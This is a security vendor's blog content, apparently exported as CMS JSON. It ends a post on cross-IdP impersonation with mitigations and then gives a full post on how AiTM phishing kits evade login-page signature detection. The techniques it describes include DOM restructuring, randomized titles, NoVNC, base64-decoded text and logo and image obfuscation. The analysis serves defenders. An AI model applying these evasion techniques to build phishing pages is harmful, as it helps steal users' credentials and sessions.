",[],{},{"nodeType":186,"data":179978,"content":179980},{"uri":179979},"https://pushsecurity.com/blog/nearly-invisible-attack-chain/#id-an-example-attack-zapier",[179981],{"nodeType":173,"value":179982,"marks":179983,"data":179985},"using Zapier to create malicious automated workflows",[179984],{"type":194},{},{"nodeType":173,"value":179987,"marks":179988,"data":179989}," to compromise integrated apps, or ",[],{},{"nodeType":186,"data":179991,"content":179992},{"uri":162243},[179993],{"nodeType":173,"value":179994,"marks":179995,"data":179997},"changing the SAML configuration of an app",[179996],{"type":194},{},{"nodeType":173,"value":179999,"marks":180000,"data":180001}," to direct logins to a malicious Okta tenant. ",[],{},{"nodeType":178,"data":180003,"content":180004},{},[180005],{"nodeType":173,"value":180006,"marks":180007,"data":180008},"Until now, there hasn’t been much research in this space. It’s not surprising when we consider that this kind of bug bounty isn’t paying out, and I know of only a handful of forward-thinking security consultancies conducting any real offensive security testing with their clients in this space. ",[],{},{"nodeType":178,"data":180010,"content":180011},{},[180012],{"nodeType":173,"value":180013,"marks":180014,"data":180015},"All organizations should be taking SaaS and identity attacks seriously — a good starting point would be to normalize SaaS and IdP configuration testing as part of routine security assessments, as well as demonstrating in-app post exploitation activity to raise awareness of how direct and dangerous these attacks can be. ",[],{},{"nodeType":231,"data":180017,"content":180018},{},[],{"nodeType":169,"data":180020,"content":180021},{},[180022],{"nodeType":173,"value":180023,"marks":180024,"data":180026},"Expect more cross-IdP impersonation in future",[180025],{"type":370},{},{"nodeType":178,"data":180028,"content":180029},{},[180030,180034,180042],{"nodeType":173,"value":180031,"marks":180032,"data":180033},"With the ",[],{},{"nodeType":186,"data":180035,"content":180036},{"uri":74621},[180037],{"nodeType":173,"value":180038,"marks":180039,"data":180041},"success of the attacks on Snowflake customers",[180040],{"type":194},{},{"nodeType":173,"value":180043,"marks":180044,"data":180045}," it feels like attackers and researchers are starting to take note, and the research scrutiny is amping up. It would be wise to expect more of these attacks in future. ",[],{},{"nodeType":178,"data":180047,"content":180048},{},[180049],{"nodeType":173,"value":180050,"marks":180051,"data":180052},"Cross-IdP impersonation could be largely prevented if all apps required re-verification upon adding a new login method by default (specifically, requiring that you log in with the original method, not approving via email link/code). This is yet another example of the inconsistencies in SaaS authentication introducing vulnerabilities. ",[],{},{"nodeType":178,"data":180054,"content":180055},{},[180056],{"nodeType":173,"value":180057,"marks":180058,"data":180059},"As this is unlikely to happen anytime soon, to mitigate the threat of cross-IdP impersonation we recommend that you:",[],{},{"nodeType":250,"data":180061,"content":180062},{},[180063,180073,180083,180093],{"nodeType":254,"data":180064,"content":180065},{},[180066],{"nodeType":178,"data":180067,"content":180068},{},[180069],{"nodeType":173,"value":180070,"marks":180071,"data":180072},"Set email alerts for employees receiving IdP activation emails to their corporate mailbox and forward to your SIEM. This will provide visibility both of unauthorized IdPs being connected to your domain by employees (which can lead to your corporate apps and accounts being compromised via less secure accounts, such as their Apple, LinkedIn, X, etc.), and of attackers attempting to register a new IdP as part of an attack. ",[],{},{"nodeType":254,"data":180074,"content":180075},{},[180076],{"nodeType":178,"data":180077,"content":180078},{},[180079],{"nodeType":173,"value":180080,"marks":180081,"data":180082},"Warn users of the risks associated with creating new IdP accounts and connecting them to their primary corporate email (as well as the possibility of phishing scams designed to trick the user into completing the verification process or passing on a verification code). ",[],{},{"nodeType":254,"data":180084,"content":180085},{},[180086],{"nodeType":178,"data":180087,"content":180088},{},[180089],{"nodeType":173,"value":180090,"marks":180091,"data":180092},"Where configurable, require downstream applications to enforce re-verification when adding new SSO methods. Requiring login with the original method, rather than email approval, is a more secure approach.",[],{},{"nodeType":254,"data":180094,"content":180095},{},[180096],{"nodeType":178,"data":180097,"content":180098},{},[180099],{"nodeType":173,"value":180100,"marks":180101,"data":180102},"Where possible, prevent the conversion of personal accounts to corporate accounts within the main IdP providers. For example, Apple Business Manager recently released the ability to lock your domain and prevent new accounts being created, as well as locking the authentication to your preferred IdP (preventing local accounts from being created) — convenient timing!",[],{},{"nodeType":312,"data":180104,"content":180108},{"target":180105},{"sys":180106},{"id":180107,"type":317,"linkType":318},"56sqxSy9QuTxzOGvUmcYBK",[],{"nodeType":178,"data":180110,"content":180111},{},[180112],{"nodeType":173,"value":180113,"marks":180114,"data":180115},"However, your ability to prevent attackers from creating new accounts on IdPs and connecting them to your domain is going to vary from IdP to IdP, so complete remediation may not be possible. And unless handled carefully, joining multiple IdPs to your primary IdP has the potential to increase your attack surface, not reduce it!",[],{},{"nodeType":178,"data":180117,"content":180118},{},[180119,180123,180130],{"nodeType":173,"value":180120,"marks":180121,"data":180122},"If you want a bit more technical detail on how this technique can be combined with verification phishing to reliably create new IdP accounts, ",[],{},{"nodeType":186,"data":180124,"content":180125},{"uri":61709},[180126],{"nodeType":173,"value":180127,"marks":180128,"data":180129},"check out this blog post.",[],{},{"nodeType":173,"value":180131,"marks":180132,"data":180133}," Here's a quick demo of the attack chain to whet your appetite... ",[],{},{"nodeType":312,"data":180135,"content":180139},{"target":180136},{"sys":180137},{"id":180138,"type":317,"linkType":318},"1rfmqEdOlYeWCkpQE0c0IE",[],{"nodeType":178,"data":180141,"content":180142},{},[180143],{"nodeType":173,"value":37,"marks":180144,"data":180145},[],{},{"nodeType":312,"data":180147,"content":180151},{"target":180148},{"sys":180149},{"id":180150,"type":317,"linkType":318},"3MGuq0h7IfW7F2ueNbc5v4",[],{"nodeType":178,"data":180153,"content":180154},{},[180155],{"nodeType":173,"value":37,"marks":180156,"data":180157},[],{},"Cross-IdP impersonation: Hijacking SSO to access downstream apps","Cross-IdP impersonation is a method of hijacking SSO to access downstream apps — without needing to compromise accounts on your company’s main IdP. ","2024-11-19T00:00:00.000Z","cross-idp-impersonation",{"items":180163},[180164,180166],{"sys":180165,"name":505},{"id":504},{"sys":180167,"name":509},{"id":508},{"items":180169},[180170],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":180171},{"url":1496},{"__typename":1528,"sys":180173,"content":180175,"title":180854,"synopsis":180855,"hashTags":118,"publishedDate":167649,"slug":180856,"tagsCollection":180857,"authorsCollection":180863},{"id":180174},"6XHbplcolYfUeAB6x3olYQ",{"json":180176},{"nodeType":165,"data":180177,"content":180178},{},[180179,180186,180204,180237,180244,180250,180257,180264,180297,180304,180311,180318,180325,180331,180338,180345,180352,180359,180366,180373,180380,180387,180394,180401,180408,180415,180421,180427,180434,180441,180448,180455,180461,180468,180475,180493,180500,180520,180526,180533,180540,180547,180554,180560,180567,180574,180581,180588,180595,180601,180607,180614,180621,180628,180635,180642,180649,180655,180662,180669,180676,180683,180690,180696,180702,180709,180716,180723,180729,180736,180743,180750,180756,180763,180769,180776,180782,180800,180818,180825,180842,180848],{"nodeType":169,"data":180180,"content":180181},{},[180182],{"nodeType":173,"value":180183,"marks":180184,"data":180185},"Picking up where we left off...",[],{},{"nodeType":178,"data":180187,"content":180188},{},[180189,180193,180200],{"nodeType":173,"value":180190,"marks":180191,"data":180192},"In our previous ",[],{},{"nodeType":186,"data":180194,"content":180195},{"uri":74693},[180196],{"nodeType":173,"value":148689,"marks":180197,"data":180199},[180198],{"type":194},{},{"nodeType":173,"value":180201,"marks":180202,"data":180203},", we looked at a range of techniques implemented by a then-recent instance of the NakedPages AiTM phishing kit for evading detection. The techniques covered previously were mostly intended to make two detection strategies for defenders much more difficult:",[],{},{"nodeType":250,"data":180205,"content":180206},{},[180207,180222],{"nodeType":254,"data":180208,"content":180209},{},[180210],{"nodeType":178,"data":180211,"content":180212},{},[180213,180218],{"nodeType":173,"value":180214,"marks":180215,"data":180217},"Writing toolkit signatures",[180216],{"type":370},{},{"nodeType":173,"value":180219,"marks":180220,"data":180221},": Through heavy use of randomization, constantly changing hosting domains/IPs, legitimate hosting options etc., it becomes very difficult for defenders to maintain effective signatures to detect either generic phishing kit code or where they are hosted.",[],{},{"nodeType":254,"data":180223,"content":180224},{},[180225],{"nodeType":178,"data":180226,"content":180227},{},[180228,180233],{"nodeType":173,"value":180229,"marks":180230,"data":180232},"Automating dynamic analysis",[180231],{"type":370},{},{"nodeType":173,"value":180234,"marks":180235,"data":180236},": Similarly to sandbox evasion for malware, phishing kits are designed to evade automated discovery and analysis, e.g. by using Cloudflare Turnstile bot detection, and requiring legitimate browser interaction and JavaScript execution in order for execution flow to reach the malicious phishing functionality.",[],{},{"nodeType":178,"data":180238,"content":180239},{},[180240],{"nodeType":173,"value":180241,"marks":180242,"data":180243},"In this blog post, we're diving deeper into a specific category of signature-based detection and how attackers are getting around them: Login page signatures. ",[],{},{"nodeType":312,"data":180245,"content":180249},{"target":180246},{"sys":180247},{"id":180248,"type":317,"linkType":318},"1aaDMth4Cxv6CMT0PJW5py",[],{"nodeType":169,"data":180251,"content":180252},{},[180253],{"nodeType":173,"value":180254,"marks":180255,"data":180256},"Login page signatures 101",[],{},{"nodeType":178,"data":180258,"content":180259},{},[180260],{"nodeType":173,"value":180261,"marks":180262,"data":180263},"The overwhelming majority of common AiTM phishing kits in the wild now are targeting the most dominant identity providers (IdPs), such as Microsoft Entra or Google Workspace. They typically emulate the login pages of these platforms to ensure the victim uses the correct password and MFA factor and completes the login process, so the attacker can steal the valid session.",[],{},{"nodeType":178,"data":180265,"content":180266},{},[180267,180271,180276,180279,180284,180288,180293],{"nodeType":173,"value":180268,"marks":180269,"data":180270},"As a result, security product vendors are naturally looking to move away from unreliable detections based on signaturing ever-changing phishing kits, toward detecting login pages that ",[],{},{"nodeType":173,"value":180272,"marks":180273,"data":180275},"look like",[180274],{"type":370},{},{"nodeType":173,"value":3107,"marks":180277,"data":180278},[],{},{"nodeType":173,"value":180280,"marks":180281,"data":180283},"Microsoft Entra, Google Workspace",[180282],{"type":370},{},{"nodeType":173,"value":180285,"marks":180286,"data":180287}," (or any other common IdP) ",[],{},{"nodeType":173,"value":180289,"marks":180290,"data":180292},"but are not hosted on the official domains",[180291],{"type":370},{},{"nodeType":173,"value":180294,"marks":180295,"data":180296},". The benefit here is that you’re focusing on a fixed, known target, rather than a constantly moving one (e.g. phishing kit codebases).",[],{},{"nodeType":178,"data":180298,"content":180299},{},[180300],{"nodeType":173,"value":180301,"marks":180302,"data":180303},"However, attackers have managed to stay one step ahead and are already using a wide range of techniques to break these detections and counter the countermeasures.",[],{},{"nodeType":169,"data":180305,"content":180306},{},[180307],{"nodeType":173,"value":180308,"marks":180309,"data":180310},"Signature evasion strategies",[],{},{"nodeType":178,"data":180312,"content":180313},{},[180314],{"nodeType":173,"value":180315,"marks":180316,"data":180317},"Well, like most good ideas, someone else has already had it — many phishing kits pre-emptively take steps to evade detections based on login page signatures. The specific evasion techniques used are a useful insight into what detection techniques are out there and are needing to be circumvented. ",[],{},{"nodeType":178,"data":180319,"content":180320},{},[180321],{"nodeType":173,"value":180322,"marks":180323,"data":180324},"Before we delve into the specific examples, let’s first consider the general strategies for this: document object model (DOM) obfuscation, and visual obfuscation. ",[],{},{"nodeType":235,"data":180326,"content":180327},{},[180328],{"nodeType":173,"value":62880,"marks":180329,"data":180330},[],{},{"nodeType":178,"data":180332,"content":180333},{},[180334],{"nodeType":173,"value":180335,"marks":180336,"data":180337},"This is the more traditional evasion approach. The goal for an attacker is to have a login page that is visually identical to the real page when viewed with the human eye. ",[],{},{"nodeType":178,"data":180339,"content":180340},{},[180341],{"nodeType":173,"value":180342,"marks":180343,"data":180344},"But that doesn’t mean the underlying DOM (or loaded HTML, CSS, and JS code) needs to be the same, or even similar, to the real login page. It’s possible to  construct a completely different DOM that ensures the same visual output with a very different underlying code. ",[],{},{"nodeType":178,"data":180346,"content":180347},{},[180348],{"nodeType":173,"value":180349,"marks":180350,"data":180351},"It’s also possible to use dynamic modification techniques to ensure the DOM changes during execution to frustrate fixed point-in-time analysis controls, like those that may be used by web proxies.  ",[],{},{"nodeType":235,"data":180353,"content":180354},{},[180355],{"nodeType":173,"value":180356,"marks":180357,"data":180358},"Visual obfuscation",[],{},{"nodeType":178,"data":180360,"content":180361},{},[180362],{"nodeType":173,"value":180363,"marks":180364,"data":180365},"With the ever-increasing capabilities of machine learning (ML) and other artificial intelligence (AI) technologies, we don’t just have to look at the underlying code and text signatures anymore. There are a range of computer vision based techniques that can be used to simulate a more human approach to assessing if a login page matches another example. ",[],{},{"nodeType":178,"data":180367,"content":180368},{},[180369],{"nodeType":173,"value":180370,"marks":180371,"data":180372},"Therefore, another approach to defeat login page signatures would be to perform visual obfuscation techniques that can frustrate computer vision-based detections, while still fooling a human user.",[],{},{"nodeType":169,"data":180374,"content":180375},{},[180376],{"nodeType":173,"value":180377,"marks":180378,"data":180379},"DOM obfuscation techniques",[],{},{"nodeType":178,"data":180381,"content":180382},{},[180383],{"nodeType":173,"value":180384,"marks":180385,"data":180386},"For consistency, we’re going to focus on Microsoft login phishing kits as they are the most common (by far), but we’ll pick from some different samples we’ve observed. Let’s start with a few examples of DOM obfuscation we have seen in the wild:",[],{},{"nodeType":235,"data":180388,"content":180389},{},[180390],{"nodeType":173,"value":180391,"marks":180392,"data":180393},"#1 – DOM structure change",[],{},{"nodeType":178,"data":180395,"content":180396},{},[180397],{"nodeType":173,"value":180398,"marks":180399,"data":180400},"If an attacker were to simply clone Microsoft’s login page, then we’d expect to see a very similar (if not identical) DOM structure, right? After all, the simplest way to emulate a web page visually is either to copy the HTML directly or transparently proxy requests to the real target with minimal changes, as tools like Evilginx do. This would make detection far simpler as we’d have a known code structure to look for. ",[],{},{"nodeType":178,"data":180402,"content":180403},{},[180404],{"nodeType":173,"value":180405,"marks":180406,"data":180407},"Unfortunately, it’s pretty common for attackers to deliberately use a completely different DOM structure for something that’s almost identical to the eye. It takes a lot more effort to implement this and so the reason for it is almost certainly to avoid this detection technique.  ",[],{},{"nodeType":178,"data":180409,"content":180410},{},[180411],{"nodeType":173,"value":180412,"marks":180413,"data":180414},"Check out the examples below to see a high-level interpretation of the DOM structure for a legitimate Microsoft login page and one phishing example. You can see how they are visually very similar, but radically different from one another when looking at DOM code:",[],{},{"nodeType":312,"data":180416,"content":180420},{"target":180417},{"sys":180418},{"id":180419,"type":317,"linkType":318},"4amv144ZzTBmd9ssh66kkr",[],{"nodeType":312,"data":180422,"content":180426},{"target":180423},{"sys":180424},{"id":180425,"type":317,"linkType":318},"2gC49b2f2Th4wAEWLPvAnL",[],{"nodeType":235,"data":180428,"content":180429},{},[180430],{"nodeType":173,"value":180431,"marks":180432,"data":180433},"#2 – Randomizing page titles",[],{},{"nodeType":178,"data":180435,"content":180436},{},[180437],{"nodeType":173,"value":180438,"marks":180439,"data":180440},"The HTML page title is one very specific place to check for similarity. For Microsoft, it can change slightly depending on the service, but if we use Outlook as an example then the page title is “Sign in to Outlook”. This also has a favicon of the Microsoft logo (another issue we’ll visit later in the article). \n\nIt’s unsurprising that attackers are randomizing the page title to evade basic detections – how many users would really notice any difference?",[],{},{"nodeType":178,"data":180442,"content":180443},{},[180444],{"nodeType":173,"value":180445,"marks":180446,"data":180447},"Some kits, such as the NakedPages case study we looked at in the previous article, use purely randomized alphanumeric text. Others use english words that may seem innocuous if a user does inspect them, but are in fact randomized between iterations to ensure any one set that is flagged will not completely block the phishing kit from operating. ",[],{},{"nodeType":178,"data":180449,"content":180450},{},[180451],{"nodeType":173,"value":180452,"marks":180453,"data":180454},"For example, see three refreshed examples of the same phishing kit below when compared with the legitimate Outlook login page title next to it.",[],{},{"nodeType":312,"data":180456,"content":180460},{"target":180457},{"sys":180458},{"id":180459,"type":317,"linkType":318},"2KuHCssISCeGYeZNC005pV",[],{"nodeType":235,"data":180462,"content":180463},{},[180464],{"nodeType":173,"value":180465,"marks":180466,"data":180467},"#3 – Desktop control techniques (e.g. NoVNC)",[],{},{"nodeType":178,"data":180469,"content":180470},{},[180471],{"nodeType":173,"value":180472,"marks":180473,"data":180474},"The most common AiTM phishing technique is some form of a web proxy method, where the victim interacts with a legitimate website that is proxying certain requests to the real backend. However, this is not the only method. Some tools utilize a Browser-in-the-Middle (BiTM) technique that involves using desktop sharing technologies to remotely control an attacker’s browser instead. ",[],{},{"nodeType":178,"data":180476,"content":180477},{},[180478,180482,180490],{"nodeType":173,"value":180479,"marks":180480,"data":180481},"If you want to know more about this, check out our ",[],{},{"nodeType":186,"data":180483,"content":180484},{"uri":49844},[180485],{"nodeType":173,"value":180486,"marks":180487,"data":180489},"previous article on AiTM phishing",[180488],{"type":194},{},{"nodeType":173,"value":1477,"marks":180491,"data":180492},[],{},{"nodeType":178,"data":180494,"content":180495},{},[180496],{"nodeType":173,"value":180497,"marks":180498,"data":180499},"The upside of this for an attacker is that the website is actually completely different from the target website under the hood. If anything, it just looks like any other website making use of similar technologies like NoVNC.",[],{},{"nodeType":178,"data":180501,"content":180502},{},[180503,180507,180516],{"nodeType":173,"value":180504,"marks":180505,"data":180506},"For example, see the following screenshot example of using the open-source BiTM tool, ",[],{},{"nodeType":186,"data":180508,"content":180510},{"uri":180509},"https://github.com/JoelGMSec/EvilnoVNC",[180511],{"nodeType":173,"value":180512,"marks":180513,"data":180515},"EvilNoVNC",[180514],{"type":194},{},{"nodeType":173,"value":180517,"marks":180518,"data":180519},". You can see how the underlying HTML and DOM are completely different due to the use of this technique, with effectively the entire page just being an HTML canvas element that is rendered like a video.",[],{},{"nodeType":312,"data":180521,"content":180525},{"target":180522},{"sys":180523},{"id":180524,"type":317,"linkType":318},"60Jt2P0ip14ycdtS9qLPhc",[],{"nodeType":235,"data":180527,"content":180528},{},[180529],{"nodeType":173,"value":180530,"marks":180531,"data":180532},"#4 – Dynamic text decoding",[],{},{"nodeType":178,"data":180534,"content":180535},{},[180536],{"nodeType":173,"value":180537,"marks":180538,"data":180539},"Sometimes there may be very specific strings that detection tools might try to signature on. Let’s use the example of text that appears visually on the login page. While most login text can be pretty generic, e.g. “Sign in”, that’s not always the case. To appear authentic, it’s better for an attacker to keep it the same, but that leaves it vulnerable to signature detection. ",[],{},{"nodeType":178,"data":180541,"content":180542},{},[180543],{"nodeType":173,"value":180544,"marks":180545,"data":180546},"For example, the placeholder text on Microsoft’s login page is “Email, phone, or Skype”. Particularly given Microsoft’s historical acquisition of Skype, this is actually a pretty specific piece of text that you won’t usually find in the username field of a login page very often. ",[],{},{"nodeType":178,"data":180548,"content":180549},{},[180550],{"nodeType":173,"value":180551,"marks":180552,"data":180553},"So how do you keep this text but make it harder to signature on? Well you fall back to classic decoding techniques to avoid static signatures. In this case, that is decoded from base64 using JavaScript’s atob() function in order to load that text dynamically during execution rather than have it statically within the HTML. This makes it harder to create a signature using common point-in-time static analysis techniques.",[],{},{"nodeType":312,"data":180555,"content":180559},{"target":180556},{"sys":180557},{"id":180558,"type":317,"linkType":318},"1PymaE09il5CubFvwSfLqW",[],{"nodeType":235,"data":180561,"content":180562},{},[180563],{"nodeType":173,"value":180564,"marks":180565,"data":180566},"#5 – Image element obfuscation",[],{},{"nodeType":178,"data":180568,"content":180569},{},[180570],{"nodeType":173,"value":180571,"marks":180572,"data":180573},"We’re starting to shift towards more visual-based obfuscation elements now, but first let’s cover  an interesting example that straddles the two.",[],{},{"nodeType":178,"data":180575,"content":180576},{},[180577],{"nodeType":173,"value":180578,"marks":180579,"data":180580},"Many login pages will have very clear examples of vendor logos present in specific locations and elements as part of a login page. This is a huge part of an authentic visual experience and so attackers would like to keep them there. However, as defenders we could specifically look for these elements, both for pure structural matching techniques or as a pre-processing step for visual matching techniques later (e.g. visually matching a logo, rather than the entire page). ",[],{},{"nodeType":178,"data":180582,"content":180583},{},[180584],{"nodeType":173,"value":180585,"marks":180586,"data":180587},"For this reason, attackers might want to obfuscate this aspect in order to make it difficult to match or locate the images used within the login page, while still ensuring they appear visually identical to a user.",[],{},{"nodeType":178,"data":180589,"content":180590},{},[180591],{"nodeType":173,"value":180592,"marks":180593,"data":180594},"Below, we can see a comparison of a legitimate Microsoft login page and a phishing kit. You can see how in the original a standard HTML \u003Cimg> element of a specific size and name are used. In comparison, our phishing kit has replaced this with a \u003Cdiv> element of a different size and made use of background image styling to ensure the \u003Cdiv> ends up with the same visual appearance despite the structural differences.",[],{},{"nodeType":312,"data":180596,"content":180600},{"target":180597},{"sys":180598},{"id":180599,"type":317,"linkType":318},"4MvwXZDjMA56ZYSdjKpu9R",[],{"nodeType":312,"data":180602,"content":180606},{"target":180603},{"sys":180604},{"id":180605,"type":317,"linkType":318},"6tNMjTvHuAWkuK0x7ZEgKr",[],{"nodeType":169,"data":180608,"content":180609},{},[180610],{"nodeType":173,"value":180611,"marks":180612,"data":180613},"Visual obfuscation techniques",[],{},{"nodeType":178,"data":180615,"content":180616},{},[180617],{"nodeType":173,"value":180618,"marks":180619,"data":180620},"As if that wasn’t enough, let’s move on to some visual obfuscation techniques that attackers are also using.",[],{},{"nodeType":235,"data":180622,"content":180623},{},[180624],{"nodeType":173,"value":180625,"marks":180626,"data":180627},"#6 – Favicon changes",[],{},{"nodeType":178,"data":180629,"content":180630},{},[180631],{"nodeType":173,"value":180632,"marks":180633,"data":180634},"We effectively saw this earlier when speaking about HTML page title randomization. The favicon is also an easy place to look for the obvious use of vendor logos. How many legitimate websites are going to have the Microsoft logo as their favicon? If they do, they may quickly end up with a cease and desist letter!",[],{},{"nodeType":178,"data":180636,"content":180637},{},[180638],{"nodeType":173,"value":180639,"marks":180640,"data":180641},"Favicons also render at a fixed size, so if an attacker wants to ensure that the Microsoft logo appears as the favicon for their page, it gives defenders a fixed target to perform image recognition against for cloned logos. ",[],{},{"nodeType":178,"data":180643,"content":180644},{},[180645],{"nodeType":173,"value":180646,"marks":180647,"data":180648},"In this phishing kit example, it looks like the authors have decided they are better off just leaving the favicon empty to avoid being vulnerable to this detection technique.",[],{},{"nodeType":312,"data":180650,"content":180654},{"target":180651},{"sys":180652},{"id":180653,"type":317,"linkType":318},"7FknWWF9ri9eZvu8Prhkd5",[],{"nodeType":235,"data":180656,"content":180657},{},[180658],{"nodeType":173,"value":180659,"marks":180660,"data":180661},"#7 – Blurred background images",[],{},{"nodeType":178,"data":180663,"content":180664},{},[180665],{"nodeType":173,"value":180666,"marks":180667,"data":180668},"Ok, this is a pretty clever one. Let’s say as a defender we wanted to perform sophisticated image recognition techniques to detect websites that look visually very similar to Microsoft’s login page overall. There may be many challenges around rendering resolution etc to deal with but conceptually we could look to match on the whole page. ",[],{},{"nodeType":178,"data":180670,"content":180671},{},[180672],{"nodeType":173,"value":180673,"marks":180674,"data":180675},"However, if an attacker makes a substantial visual change to the page that still appears authentic then this would prevent the technique from operating effectively. One common graphic design method used when a modal pops up is to blur the background. Some phishing kits use similar techniques on their login pages with a variety of different background images that are derived from legitimate Microsoft sources. ",[],{},{"nodeType":178,"data":180677,"content":180678},{},[180679],{"nodeType":173,"value":180680,"marks":180681,"data":180682},"The first time you see this, it’s easy to think you’ve seen this a hundred times before. It just seems very familiar and authentic… except it’s not. The real login page has a blank background. Therefore, any algorithms looking for visual similarity of the overall page are not going to match because they are actually radically different. ",[],{},{"nodeType":178,"data":180684,"content":180685},{},[180686],{"nodeType":173,"value":180687,"marks":180688,"data":180689},"This is a trick on the human brain and the way we interpret images, not a trick on a computer vision algorithm. Take a look at the phishing example and the real Microsoft login page below:",[],{},{"nodeType":312,"data":180691,"content":180695},{"target":180692},{"sys":180693},{"id":180694,"type":317,"linkType":318},"6KnrHECqltSOgSCGHIjYEL",[],{"nodeType":312,"data":180697,"content":180701},{"target":180698},{"sys":180699},{"id":180700,"type":317,"linkType":318},"1nb6K1MyBkON2eBHk1365B",[],{"nodeType":235,"data":180703,"content":180704},{},[180705],{"nodeType":173,"value":180706,"marks":180707,"data":180708},"#8 – Logo substitution",[],{},{"nodeType":178,"data":180710,"content":180711},{},[180712],{"nodeType":173,"value":180713,"marks":180714,"data":180715},"You might have noticed one other change with the previous image – the logo that was used. We saw earlier how some phishing kits make it harder to identify individual logos within an image through DOM obfuscation techniques. However, the other approach is to substitute logos for similar ones that give a sense of authenticity to the user but are visually completely different.",[],{},{"nodeType":178,"data":180717,"content":180718},{},[180719],{"nodeType":173,"value":180720,"marks":180721,"data":180722},"In this case, the phishing kit has chosen to use the newer purple hexagon Microsoft 365 logo in place of the standard Microsoft logo on the login page. Users will no doubt be familiar with this logo as belonging to Microsoft and so it still gives the sense of authenticity. A computer vision algorithm looking to match the original logo won’t know that though!",[],{},{"nodeType":312,"data":180724,"content":180728},{"target":180725},{"sys":180726},{"id":180727,"type":317,"linkType":318},"5o1WRmupkYPr9QmeQUf5uF",[],{"nodeType":235,"data":180730,"content":180731},{},[180732],{"nodeType":173,"value":180733,"marks":180734,"data":180735},"#9 - Sub-image obfuscation",[],{},{"nodeType":178,"data":180737,"content":180738},{},[180739],{"nodeType":173,"value":180740,"marks":180741,"data":180742},"Ok, so let’s say an attacker wants to use the real logo and they’ve even used the image element obfuscation method we saw earlier to dynamically set the image as a background image for a \u003Cdiv> element. ",[],{},{"nodeType":178,"data":180744,"content":180745},{},[180746],{"nodeType":173,"value":180747,"marks":180748,"data":180749},"However, it’s not impossible for these images to be isolated and analyzed. Perhaps a defender might enumerate all divs, compute the background images and analyze them all. We can see an example of using code to do this to determine the image used by a \u003Cdiv> element in a phishing kit below:",[],{},{"nodeType":312,"data":180751,"content":180755},{"target":180752},{"sys":180753},{"id":180754,"type":317,"linkType":318},"79e7r8I5p0Nh9hpqrRs9eJ",[],{"nodeType":178,"data":180757,"content":180758},{},[180759],{"nodeType":173,"value":180760,"marks":180761,"data":180762},"This gives us the base64 image data that was set as the background image. However, if we look at that image data directly we see it’s an obfuscated form of the image, even though it displays correctly when properly cropped as it’s embedded in the overall page:",[],{},{"nodeType":312,"data":180764,"content":180768},{"target":180765},{"sys":180766},{"id":180767,"type":317,"linkType":318},"jXlXRHrezWsZ27CiQIyBO",[],{"nodeType":178,"data":180770,"content":180771},{},[180772],{"nodeType":173,"value":180773,"marks":180774,"data":180775},"This makes it harder for a visual algorithm to match the logo as it’s clearly not exactly the same. Instead, careful construction of the div and related DOM has ensured that these obfuscated edge pieces do not show visually to the user.",[],{},{"nodeType":169,"data":180777,"content":180778},{},[180779],{"nodeType":173,"value":40632,"marks":180780,"data":180781},[],{},{"nodeType":178,"data":180783,"content":180784},{},[180785,180789,180796],{"nodeType":173,"value":180786,"marks":180787,"data":180788},"In ",[],{},{"nodeType":186,"data":180790,"content":180791},{"uri":74693},[180792],{"nodeType":173,"value":180793,"marks":180794,"data":180795},"our previous article",[],{},{"nodeType":173,"value":180797,"marks":180798,"data":180799},", we looked at a higher level set of techniques used by phishing kits to avoid detection. In this article, we’ve dived deeper into one particular strategy of breaking login page signatures and have shown how, even inside of this one strategy, there are many different sub-techniques being used to evade common detections.",[],{},{"nodeType":178,"data":180801,"content":180802},{},[180803,180807,180814],{"nodeType":173,"value":180804,"marks":180805,"data":180806},"Looking at the evasion techniques discussed here and in ",[],{},{"nodeType":186,"data":180808,"content":180809},{"uri":74693},[180810],{"nodeType":173,"value":180811,"marks":180812,"data":180813},"Part 1",[],{},{"nodeType":173,"value":180815,"marks":180816,"data":180817},", it’s pretty clear that attackers are consciously looking to bypass automated detection techniques typically implemented through either web traffic analysis (using a web proxy inspection tool or Secure Web Gateway) or website sandboxing (for example link analysis provided by an email security appliance).",[],{},{"nodeType":178,"data":180819,"content":180820},{},[180821],{"nodeType":173,"value":180822,"marks":180823,"data":180824},"On a positive note, this shows us that (at least some) detection tools are trending upwards on the Pyramid of Pain — moving away from nearly pointless signatures like IP addresses and domains towards more in-depth detections of specific tool techniques. Though it’s also fair to say that, in this cat-and-mouse game, it seems the attackers are maintaining the advantage. This may be because these detection technologies are widely available, and attackers can test their kits against these tools and change them just enough to bypass them.",[],{},{"nodeType":178,"data":180826,"content":180827},{},[180828,180832,180839],{"nodeType":173,"value":180829,"marks":180830,"data":180831},"If you’re interested in how Push is able to detect these attacks despite all these ever evolving evasion techniques by using browser telemetry and evaluating user interaction with these kits — ",[],{},{"nodeType":186,"data":180833,"content":180834},{"uri":9120},[180835],{"nodeType":173,"value":180836,"marks":180837,"data":180838},"take a look at how we do phishing detection.",[],{},{"nodeType":173,"value":37,"marks":180840,"data":180841},[],{},{"nodeType":312,"data":180843,"content":180847},{"target":180844},{"sys":180845},{"id":180846,"type":317,"linkType":318},"6H8HmAmYiGvs3T7kQLA4dd",[],{"nodeType":178,"data":180849,"content":180850},{},[180851],{"nodeType":173,"value":37,"marks":180852,"data":180853},[],{},"How AitM phishing kits evade detection: Part 2","How attackers are breaking detection signatures designed to identify phishing sites impersonating real login pages.","how-aitm-phishing-kits-evade-detection-p2",{"items":180858},[180859,180861],{"sys":180860,"name":509},{"id":508},{"sys":180862,"name":505},{"id":504},{"items":180864},[180865],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":180866},{"url":8615},{"__typename":1528,"sys":180868,"content":180869,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":181143,"authorsCollection":181149},{"id":162},{"json":180870},{"nodeType":165,"data":180871,"content":180872},{},[180873,180879,180895,180908,180914,180920,180923,180929,180935,180983,180989,180994,180997,181003,181009,181015,181021,181027,181041,181046,181052,181058,181072,181077,181083,181089,181095,181101,181107,181110,181116,181132,181137],{"nodeType":169,"data":180874,"content":180875},{},[180876],{"nodeType":173,"value":174,"marks":180877,"data":180878},[],{},{"nodeType":178,"data":180880,"content":180881},{},[180882,180885,180892],{"nodeType":173,"value":182,"marks":180883,"data":180884},[],{},{"nodeType":186,"data":180886,"content":180887},{"uri":188},[180888],{"nodeType":173,"value":191,"marks":180889,"data":180891},[180890],{"type":194},{},{"nodeType":173,"value":197,"marks":180893,"data":180894},[],{},{"nodeType":178,"data":180896,"content":180897},{},[180898,180901,180905],{"nodeType":173,"value":204,"marks":180899,"data":180900},[],{},{"nodeType":173,"value":208,"marks":180902,"data":180904},[180903],{"